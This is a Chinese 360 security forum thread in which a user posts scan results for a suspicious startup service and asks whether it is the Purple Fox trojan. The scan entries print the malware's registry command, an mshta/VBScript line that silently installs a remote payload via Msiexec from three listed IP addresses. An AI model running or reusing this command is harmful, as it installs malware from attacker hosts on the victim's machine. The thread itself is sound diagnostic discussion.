请使用手机微信扫码安全登录

切换账号密码登录

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城

推荐论坛版块活动360粉丝商城众测粉丝轰趴馆常见问题
本帖最后由 沧桑浪子 于 2022-7-9 10:10 编辑
类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序,存在潜在安全风险,且会影响系统的运行速度。如果您确认其需要自动运行,请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\System32\mshta.exe
文件大小:12K (12,288 字节)
文件版本:9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
文件描述:Microsoft (R) HTML Application host
文件指纹(MD5):e49ec15effc9f01298093dbd7e0a31af
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC08
注册表名称:ImagePath
注册表值:mshta.exe vb:createobject(w.shell).run(Cmd /c for /d %i in (61.174.50.5:13321 177.137.96.14:12264 78.141.219.184:17508 ) do Msiexec /i http://%i/F12E5CE5.Png /Q,0)(window.close)
处理建议:禁止自启动


类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序,存在潜在安全风险,且会影响系统的运行速度。如果您确认其需要自动运行,请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\System32\cmd.exe
文件大小:337K (345,088 字节)
文件版本:6.1.7601.17514 (win7sp1_rtm.101119-1850)
文件描述:Windows Command Processor
文件指纹(MD5):5746bd7e255dd6a8afa06f7c42c1ba41
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC08
注册表名称:ImagePath
注册表值:mshta.exe vb:createobject(w.shell).run(Cmd /c for /d %i in (61.174.50.5:13321 177.137.96.14:12264 78.141.219.184:17508 ) do Msiexec /i http://%i/F12E5CE5.Png /Q,0)(window.close)
处理建议:禁止自启动

共 2 个关于【已解决】这是什么病毒?是紫狐吗?的回复 最后回复于 2022-1-6 17:06

评论

直达楼层

沙发
360fans_uid24929363 产品答疑师 发表于 2021-6-2 17:14 | 只看该作者 | 私信
您好,这两个文件均为系统文件,疑似是有程序去利用此文件开机自启,建议禁止开机自启,并全盘查杀
板凳
沧桑浪子 VIP认证 LV11.大校 楼主 发表于 2022-1-6 17:06 | 只看该作者 | 私信
看ip应该就是紫狐木马
您需要登录后才可以回帖 登录 | 注册

本版积分规则

沧桑浪子 VIP认证 LV11.大校

粉丝:35 关注:14 积分:45454

精华:0 金币:45340 经验:37925

最后登录时间:2024-4-27

360安全路由 P1(冰川银) 奇酷手机旗舰版(全网通) 安全卫士10周年纪念 360手机 N5 360手机 N5S 360粉丝达人勋章 360手机N7 360商城青铜会员

私信 加好友

最新活动

读书日主题活动 |  世界读书日,360AI阅读

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

      扫码添加360客服号,涨知识的同时还有超多福利等你哦

      快速回复 返回顶部 返回列表